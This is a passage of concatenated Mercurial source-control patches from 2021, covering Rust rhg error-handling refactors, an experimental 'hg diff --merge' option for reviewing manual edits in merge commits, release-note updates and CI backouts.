=> CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), + RevlogError::AmbiguousPrefix => CommandError::abort(format!( + "ambiguous revision identifier {}", + rev )), - RevlogError::Other(err) => CommandError::Other(err), + RevlogError::Other(error) => error.into(), } } } diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,5 @@ /// Generic abort pub const ABORT: ExitCode = 255; -/// Command not implemented by rhg -pub const UNIMPLEMENTED_COMMAND: ExitCode = 252; +/// Command or feature not implemented by rhg +pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -5,6 +5,7 @@ use clap::ArgGroup; use clap::ArgMatches; use clap::SubCommand; +use format_bytes::format_bytes; use hg::operations::DebugDataKind; use std::convert::TryFrom; @@ -91,26 +92,31 @@ let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED_COMMAND) + std::process::exit(exitcode::UNIMPLEMENTED) }); let ui = ui::Ui::new(); let command_result = match_subcommand(matches, &ui); - match command_result { - Ok(_) => std::process::exit(exitcode::OK), - Err(e) => { - let message = e.get_error_message_bytes(); - if let Some(msg) = message { - match ui.write_stderr(&msg) { - Ok(_) => (), - Err(_) => std::process::exit(exitcode::ABORT), - }; - }; - e.exit() + let exit_code = match command_result { + Ok(_) => exitcode::OK, + + // Exit with a specific code and no error message to let a potential + // wrapper script fallback to Python-based Mercurial. + Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, + + Err(CommandError::Abort { message }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. + let _ = + ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + exitcode::ABORT } - } + }; + std::process::exit(exit_code) } fn match_subcommand( diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -38,7 +38,7 @@ Deleted repository $ rm -rf `pwd` $ rhg root - abort: error getting current working directory: $ENOENT$ + abort: $ENOENT$: current directory [255] Listing tracked files @@ -163,7 +163,7 @@ $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements - corrupted repository: parse error in 'requires' file + abort: corrupted repository: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611862302 -3600 # Thu Jan 28 20:31:42 2021 +0100 # Node ID 1dcd9c9975eda56a0339c44e3c87f3a02213f7db # Parent ca3f73cc3cf4269ae519878628cba51a70065fa5 rust: Fold find_root and check_requirements into Repo::find Differential Revision: https://phab.mercurial-scm.org/D9906 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,7 +11,7 @@ use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; use std::path::PathBuf; -use crate::operations::find_root; +use crate::repo::Repo; use crate::utils::files::read_whole_file; /// Holds the config values for the current repository @@ -76,10 +76,9 @@ /// Loads the local config. In a future version, this will also load the /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load() -> Result<Self, ConfigError> { - let root = find_root().unwrap(); + pub fn load_for_repo(repo: &Repo) -> Result<Self, ConfigError> { Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(root.join(".hg/hgrc")), + ConfigSource::AbsPath(repo.hg_vfs().join("hgrc")), ])?) } diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs deleted file mode 100644 --- a/rust/hg-core/src/operations/find_root.rs +++ /dev/null @@ -1,79 +0,0 @@ -use std::path::{Path, PathBuf}; - -/// Error type for `find_root` -#[derive(Debug)] -pub enum FindRootError { - /// Root of the repository has not been found - /// Contains the current directory used by FindRoot - RootNotFound(PathBuf), - /// The current directory does not exists or permissions are insufficient - /// to get access to it - GetCurrentDirError(std::io::Error), -} - -/// Find the root of the repository -/// by searching for a .hg directory in the process’ current directory and its -/// ancestors -pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir() - .map_err(|e| FindRootError::GetCurrentDirError(e))?; - Ok(find_root_from_path(¤t_dir)?.into()) -} - -/// Find the root of the repository -/// by searching for a .hg directory in the given directory and its ancestors -pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> { - if start.join(".hg").exists() { - return Ok(start); - } - for ancestor in start.ancestors() { - if ancestor.join(".hg").exists() { - return Ok(ancestor); - } - } - Err(FindRootError::RootNotFound(start.into())) -} - -#[cfg(test)] -mod tests { - use super::*; - use std::fs; - use tempfile; - - #[test] - fn dot_hg_not_found() { - let tmp_dir = tempfile::tempdir().unwrap(); - let path = tmp_dir.path(); - - let err = find_root_from_path(&path).unwrap_err(); - - // TODO do something better - assert!(match err { - FindRootError::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }) - } - - #[test] - fn dot_hg_in_current_path() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let result = find_root_from_path(&root).unwrap(); - - assert_eq!(result, root) - } - - #[test] - fn dot_hg_in_parent() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let directory = root.join("some/nested/directory"); - let result = find_root_from_path(&directory).unwrap(); - - assert_eq!(result, root) - } -} /* tests */ diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -5,10 +5,8 @@ mod cat; mod debugdata; mod dirstate_status; -mod find_root; mod list_tracked_files; pub use cat::cat; pub use debugdata::{debug_data, DebugDataKind}; -pub use find_root::{find_root, find_root_from_path, FindRootError}; pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,5 +1,4 @@ use crate::errors::{HgError, IoResultExt}; -use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; use std::path::{Path, PathBuf}; @@ -11,6 +10,15 @@ store: PathBuf, } +#[derive(Debug, derive_more::From)] +pub enum RepoFindError { + NotFoundInCurrentDirectoryOrAncestors { + current_directory: PathBuf, + }, + #[from] + Other(HgError), +} + /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] pub(crate) struct Vfs<'a> { @@ -18,24 +26,26 @@ } impl Repo { - /// Returns `None` if the given path doesn’t look like a repository - /// (doesn’t contain a `.hg` sub-directory). - pub fn for_path(root: impl Into<PathBuf>) -> Self { - let working_directory = root.into(); - let dot_hg = working_directory.join(".hg"); - Self { - store: dot_hg.join("store"), - dot_hg, - working_directory, + /// Search the current directory and its ancestores for a repository: + /// a working directory that contains a `.hg` sub-directory. + pub fn find() -> Result<Self, RepoFindError> { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` as-is. + for ancestor in current_directory.ancestors() { + let dot_hg = ancestor.join(".hg"); + if dot_hg.is_dir() { + let repo = Self { + store: dot_hg.join("store"), + dot_hg, + working_directory: ancestor.to_owned(), + }; + requirements::check(&repo)?; + return Ok(repo); + } } - } - - pub fn find() -> Result<Self, FindRootError> { - find_root().map(Self::for_path) - } - - pub fn check_requirements(&self) -> Result<(), HgError> { - requirements::check(self) + Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { + current_directory, + }) } pub fn working_directory_path(&self) -> &Path { @@ -65,11 +75,15 @@ } impl Vfs<'_> { + pub(crate) fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + self.base.join(relative_path) + } + pub(crate) fn read( &self, relative_path: impl AsRef<Path>, ) -> Result<Vec<u8>, HgError> { - let path = self.base.join(relative_path); + let path = self.join(relative_path); std::fs::read(&path).for_file(&path) } diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -31,7 +31,6 @@ #[timed] fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; - repo.check_requirements()?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -48,7 +48,6 @@ impl<'a> Command for FilesCommand<'a> { fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; - repo.check_requirements()?; if let Some(rev) = self.rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,8 +1,10 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; -use hg::errors::{HgError, IoErrorContext}; -use hg::operations::FindRootError; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::RepoFindError; use hg::revlog::revlog::RevlogError; +use hg::utils::files::get_bytes_from_path; use std::convert::From; /// The kind of command error @@ -48,18 +50,18 @@ } } -impl From<FindRootError> for CommandError { - fn from(err: FindRootError) -> Self { - match err { - FindRootError::RootNotFound(path) => CommandError::abort(format!( - "no repository found in '{}' (.hg not found)!", - path.display() - )), - FindRootError::GetCurrentDirError(error) => HgError::IoError { - error, - context: IoErrorContext::CurrentDir, - } - .into(), +impl From<RepoFindError> for CommandError { + fn from(error: RepoFindError) -> Self { + match error { + RepoFindError::NotFoundInCurrentDirectoryOrAncestors { + current_directory, + } => CommandError::Abort { + message: format_bytes!( + b"no repository found in '{}' (.hg not found)!", + get_bytes_from_path(current_directory) + ), + }, + RepoFindError::Other(error) => error.into(), } } } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -153,13 +153,7 @@ [252] $ rhg debugrequirements - dotencode - fncache - generaldelta - revlogv1 - sparserevlog - store - indoor-pool + [252] $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612180531 -3600 # Mon Feb 01 12:55:31 2021 +0100 # Node ID 0cb1b02228a65048ca872ab5d10d511bae71b12c # Parent 1dcd9c9975eda56a0339c44e3c87f3a02213f7db rust: use HgError in ConfigError Differential Revision: https://phab.mercurial-scm.org/D9938 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,7 +8,9 @@ // GNU General Public License version 2 or any later version. use super::layer; -use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; +use crate::config::layer::{ + ConfigError, ConfigLayer, ConfigParseError, ConfigValue, +}; use std::path::PathBuf; use crate::repo::Repo; @@ -89,11 +91,11 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigError> { + ) -> Result<Option<bool>, ConfigParseError> { match self.get_inner(§ion, &item) { Some((layer, v)) => match parse_bool(&v.bytes) { Some(b) => Ok(Some(b)), - None => Err(ConfigError::Parse { + None => Err(ConfigParseError { origin: layer.origin.to_owned(), line: v.line, bytes: v.bytes.to_owned(), diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,6 +7,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::{HgError, IoResultExt}; use crate::utils::files::{ get_bytes_from_path, get_path_from_bytes, read_whole_file, }; @@ -99,20 +100,12 @@ if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; let filename_to_include = get_path_from_bytes(&filename_bytes); - match read_include(&src, &filename_to_include) { - (include_src, Ok(data)) => { - layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); - current_layer = - Self::new(ConfigOrigin::File(src.to_owned())); - } - (_, Err(e)) => { - return Err(ConfigError::IncludeError { - path: filename_to_include.to_owned(), - io_error: e, - }) - } - } + let (include_src, result) = + read_include(&src, &filename_to_include); + let data = result.for_file(filename_to_include)?; + layers.push(current_layer); + layers.extend(Self::parse(&include_src, &data)?); + current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = SECTION_RE.captures(&bytes) { section = m[1].to_vec(); @@ -145,11 +138,12 @@ map.remove(&m[1]); } } else { - return Err(ConfigError::Parse { + return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), line: Some(index + 1), bytes: bytes.to_owned(), - }); + } + .into()); } } if !current_layer.is_empty() { @@ -226,21 +220,17 @@ } } +#[derive(Debug)] +pub struct ConfigParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub bytes: Vec<u8>, +} + #[derive(Debug, derive_more::From)] pub enum ConfigError { - Parse { - origin: ConfigOrigin, - line: Option<usize>, - bytes: Vec<u8>, - }, - /// Failed to include a sub config file - IncludeError { - path: PathBuf, - io_error: std::io::Error, - }, - /// Any IO error that isn't expected - #[from] - IO(std::io::Error), + Parse(ConfigParseError), + Other(HgError), } fn make_regex(pattern: &'static str) -> Regex { # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1588884626 14400 # Thu May 07 16:50:26 2020 -0400 # Node ID 1a7d12c82057a856458301b4a757055764fb20fc # Parent 0cb1b02228a65048ca872ab5d10d511bae71b12c diff: add experimental support for "merge diffs" The way this works is it re-runs the merge and "stores" conflicts, and then diffs against the conflicted result. In a normal merge, you should only see diffs against conflicted regions or in cases where there was a semantic conflict but not a textual one. This makes it easier to detect "evil merges" that contain substantial new work embedded in the merge commit. Differential Revision: https://phab.mercurial-scm.org/D8504 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -29,6 +29,7 @@ bundlecaches, changegroup, cmdutil, + context as contextmod, copies, debugcommands as debugcommandsmod, destutil, @@ -2464,6 +2465,16 @@ (b'', b'from', b'', _(b'revision to diff from'), _(b'REV1')), (b'', b'to', b'', _(b'revision to diff to'), _(b'REV2')), (b'c', b'change', b'', _(b'change made by revision'), _(b'REV')), + ( + b'', + b'merge', + False, + _( + b'show difference between auto-merge and committed ' + b'merge for merge commits (EXPERIMENTAL)' + ), + _(b'REV'), + ), ] + diffopts + diffopts2 @@ -2544,13 +2555,31 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') + diffmerge = opts.get(b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - ctx1 = ctx2.p1() + if diffmerge and ctx2.p2().node() != nullid: + pctx1 = ctx2.p1() + pctx2 = ctx2.p2() + wctx = contextmod.overlayworkingctx(repo) + wctx.setbase(pctx1) + with ui.configoverride( + { + ( + b'ui', + b'forcemerge', + ): b'internal:merge3-lie-about-conflicts', + }, + b'diff --merge', + ): + mergemod.merge(pctx2, wc=wctx) + ctx1 = wctx + else: + ctx1 = ctx2.p1() elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -336,7 +336,7 @@ debugwhyunstable: debugwireargs: three, four, five, ssh, remotecmd, insecure debugwireproto: localssh, peer, noreadstderr, nologhandshake, ssh, remotecmd, insecure - diff: rev, from, to, change, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos + diff: rev, from, to, change, merge, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos export: bookmark, output, switch-parent, rev, text, git, binary, nodates, template files: rev, print0, include, exclude, template, subrepos forget: interactive, include, exclude, dry-run diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -194,4 +194,108 @@ 9 10 +merge diff should show only manual edits to a merge: + + $ hg diff --merge -c 6 + merging file.txt +(no diff output is expected here) + +Construct an "evil merge" that does something other than just the merge. + + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge -r 5 + merging file.txt + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo 11 >> file.txt + $ hg ci -m 'merge 8 to y with manual edit of 11' # 7 + created new head + $ hg diff -c 7 + diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,6 +6,7 @@ + 5 + 6 + 7 + -8 + +y + 9 + 10 + +11 +Contrast with the `hg diff -c 7` version above: only the manual edit shows +up, making it easy to identify changes someone is otherwise trying to sneak +into a merge. + $ hg diff --merge -c 7 + merging file.txt + diff -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -9,3 +9,4 @@ + y + 9 + 10 + +11 + +Set up a conflict. + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ sed -e 's,^8$,z,' file.txt > file.txt.tmp + $ mv file.txt.tmp file.txt + $ hg ci -m 'conflicting edit: 8 to z' + created new head + $ echo "this file is new in p1 of the merge" > new-file-p1.txt + $ hg ci -Am 'new file' new-file-p1.txt + $ hg log -r . --template 'p1 will be rev {rev}\n' + p1 will be rev 9 + $ hg co 5 + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo "this file is new in p2 of the merge" > new-file-p2.txt + $ hg ci -Am 'new file' new-file-p2.txt + created new head + $ hg log -r . --template 'p2 will be rev {rev}\n' + p2 will be rev 10 + $ hg co -- 9 + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge -r 10 + merging file.txt + warning: conflicts while merging file.txt! (edit, then use 'hg resolve --mark') + 1 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon + [1] + $ hg revert file.txt -r . + $ hg resolve -ma + (no more unresolved files) + $ hg commit -m 'merge conflicted edit' +Without --merge, it's a diff against p1 + $ hg diff --no-merge -c 11 + diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt + --- /dev/null Thu Jan 01 00:00:00 1970 +0000 + +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -0,0 +1,1 @@ + +this file is new in p2 of the merge +With --merge, it's a diff against the conflicted content. + $ hg diff --merge -c 11 + merging file.txt + diff -r 5010caab09f6 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,12 +6,6 @@ + 5 + 6 + 7 + -<<<<<<< local: fd1f17c90d7c - test: new file + z + -||||||| base + -8 + -======= + -y + ->>>>>>> other: d9e7de69eac3 - test: new file + 9 + 10 + +There must _NOT_ be a .hg/merge directory leftover. + $ test ! -d .hg/merge +(No output is expected) $ cd .. # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612198638 18000 # Mon Feb 01 11:57:18 2021 -0500 # Node ID 62a0b5daa15f10ad30d9dc30b6984b009308ec53 # Parent 1a7d12c82057a856458301b4a757055764fb20fc diff: suppress `merging foo` output lines when performing a merge diff Differential Revision: https://phab.mercurial-scm.org/D9939 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2576,7 +2576,9 @@ }, b'diff --merge', ): + repo.ui.pushbuffer() mergemod.merge(pctx2, wc=wctx) + repo.ui.popbuffer() ctx1 = wctx else: ctx1 = ctx2.p1() diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -197,7 +197,6 @@ merge diff should show only manual edits to a merge: $ hg diff --merge -c 6 - merging file.txt (no diff output is expected here) Construct an "evil merge" that does something other than just the merge. @@ -228,7 +227,6 @@ up, making it easy to identify changes someone is otherwise trying to sneak into a merge. $ hg diff --merge -c 7 - merging file.txt diff -r 8ad85e839ba7 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 @@ -277,7 +275,6 @@ +this file is new in p2 of the merge With --merge, it's a diff against the conflicted content. $ hg diff --merge -c 11 - merging file.txt diff -r 5010caab09f6 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612212953 28800 # Mon Feb 01 12:55:53 2021 -0800 # Node ID 1c66795862cf76e985e7d187df2f5b04fc8c25fb # Parent 62a0b5daa15f10ad30d9dc30b6984b009308ec53 # Parent 0e2e7300f4302b02412b0b734717697049494c4c branching: merge with stable diff --git a/contrib/packaging/inno/readme.rst b/contrib/packaging/inno/readme.rst --- a/contrib/packaging/inno/readme.rst +++ b/contrib/packaging/inno/readme.rst @@ -34,7 +34,7 @@ Next, invoke ``packaging.py`` to produce an Inno installer. You will need to supply the path to the Python interpreter to use.:: - $ python3.exe contrib\packaging\packaging.py \ + $ py -3 contrib\packaging\packaging.py \ inno --python c:\python27\python.exe .. note:: diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -39,7 +39,8 @@ <Property Id="INSTALLDIR"> <ComponentSearch Id='SearchForMainExecutableComponent' - Guid='$(var.ComponentMainExecutableGUID)' /> + Guid='$(var.ComponentMainExecutableGUID)' + Type='directory' /> </Property> <!--Property Id='ARPCOMMENTS'>any comments</Property--> diff --git a/contrib/packaging/wix/readme.rst b/contrib/packaging/wix/readme.rst --- a/contrib/packaging/wix/readme.rst +++ b/contrib/packaging/wix/readme.rst @@ -40,7 +40,7 @@ Next, invoke ``packaging.py`` to produce an MSI installer. You will need to supply the path to the Python interpreter to use.:: - $ python3 contrib\packaging\packaging.py \ + $ py -3 contrib\packaging\packaging.py \ wix --python c:\python27\python.exe .. note:: diff --git a/relnotes/next b/relnotes/5.7 copy from relnotes/next copy to relnotes/5.7 --- a/relnotes/next +++ b/relnotes/5.7 @@ -39,7 +39,11 @@ is also supported by "premerge" as `merge-tools.<tool>.premerge=keep-mergediff`. - * External hooks are now called with `HGPLAIN=1` preset. + * External hooks are now called with `HGPLAIN=1` preset. This has the side + effect of ignoring aliases, templates, revsetaliases, and a few other config + options in any `hg` command spawned by the hook. The previous behavior + can be restored by setting HGPLAINEXCEPT appropriately in the parent process. + See `hg help environment` for the list of items, and how to set it. * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -1,60 +1,13 @@ == New Features == - - * There is a new config section for templates used by hg commands. It - is called `[command-templates]`. Some existing config options have - been deprecated in favor of config options in the new - section. These are: `ui.logtemplate` to `command-templates.log`, - `ui.graphnodetemplate` to `command-templates.graphnode`, - `ui.mergemarkertemplate` to `command-templates.mergemarker`, - `ui.pre-merge-tool-output-template` to - `command-templates.pre-merge-tool-output`. - - * There is a new set of config options for the template used for the - one-line commit summary displayed by various commands, such as `hg - rebase`. The main one is `command-templates.oneline-summary`. That - can be overridden per command with - `command-templates.oneline-summary.<command>`, where `<command>` - can be e.g. `rebase`. As part of this effort, the default format - from `hg rebase` was reorganized a bit. - + * `hg purge` is now a core command using `--confirm` by default. - - * `hg strip`, from the strip extension, is now a core command, `hg - debugstrip`. The extension remains for compatibility. - - * `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>` - arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been - deprecated. - - * The memory footprint per changeset during pull/unbundle - operations has been further reduced. - - * There is a new internal merge tool called `internal:mergediff` (can - be set as the value for the `merge` config in the `[ui]` - section). It resolves merges the same was as `internal:merge` and - `internal:merge3`, but it shows conflicts differently. Instead of - showing 2 or 3 snapshots of the conflicting pieces of code, it - shows one snapshot and a diff. This may be useful when at least one - side of the conflict is similar to the base. The new marker style - is also supported by "premerge" as - `merge-tools.<tool>.premerge=keep-mergediff`. - - * External hooks are now called with `HGPLAIN=1` preset. - - * The `branchmap` cache is updated more intelligently and can be - significantly faster for repositories with many branches and changesets. - + * The `rev-branch-cache` is now updated incrementally whenever changesets are added. == New Experimental Features == -* `experimental.single-head-per-branch:public-changes-only` can be used - restrict the single head check to public revision. This is useful for - overlay repository that have both a publishing and non-publishing view - of the same storage. - == Bug Fixes == @@ -62,9 +15,6 @@ == Backwards Compatibility Changes == - * `--force-lock` and `--force-wlock` options on `hg debuglock` command are - renamed to `--force-free-lock` and `--force-free-wlock` respectively. - == Internal API Changes == # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612217604 18000 # Mon Feb 01 17:13:24 2021 -0500 # Node ID 6b847757dd8d344ce1805e7230fddf8b1b6c2a83 # Parent 1c66795862cf76e985e7d187df2f5b04fc8c25fb relnotes: add entry for `hg diff --merge -c` Differential Revision: https://phab.mercurial-scm.org/D9944 diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -8,6 +8,11 @@ == New Experimental Features == + * `hg diff` now takes an experimental `--merge` flag which causes `hg + diff --change` to show the changes relative to an automerge for + merge changesets. This makes it easier to detect and review manual + changes performed in merge changesets. + == Bug Fixes == # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612276538 -3600 # Tue Feb 02 15:35:38 2021 +0100 # Node ID 5be886200eb6594b763f89199f063432d55a0330 # Parent 6b847757dd8d344ce1805e7230fddf8b1b6c2a83 ci-fix: backed out changeset d4c8b4b90ecb This changeset is part of a series that break Continuous integration on python 2 for about a week. As not concrete solution have been found so far the safer seems to back it out until we can figure the details out. Differential Revision: https://phab.mercurial-scm.org/D9947 diff --git a/black.toml b/black.toml new file mode 100644 --- /dev/null +++ b/black.toml @@ -0,0 +1,14 @@ +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black +black:command = black --config=black.toml - black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,18 +1,3 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" - -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,6 +66,7 @@ COPYING Makefile README.rst + black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. - $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1612276558 -3600 # Tue Feb 02 15:35:58 2021 +0100 # Node ID 1e26b882d7040f56c63c7e229f9d73629b70fc7b # Parent 5be886200eb6594b763f89199f063432d55a0330 ci-fix: backed out changeset 45afff0f530a This changeset is part of a series that break Continuous integration on python 2 for about a week. As not concrete solution have been found so far the safer seems to back it out until we can figure the details out. Differential Revision: https://phab.mercurial-scm.org/D9948 diff --git a/pyproject.toml b/pyproject.toml deleted file mode 100644 --- a/pyproject.toml +++ /dev/null @@ -1,3 +0,0 @@ -[build-system] -requires = ["setuptools", "wheel"] -build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,7 +70,6 @@ hg hgeditor hgweb.cgi - pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1612281413 18000 # Tue Feb 02 10:56:53 2021 -0500 # 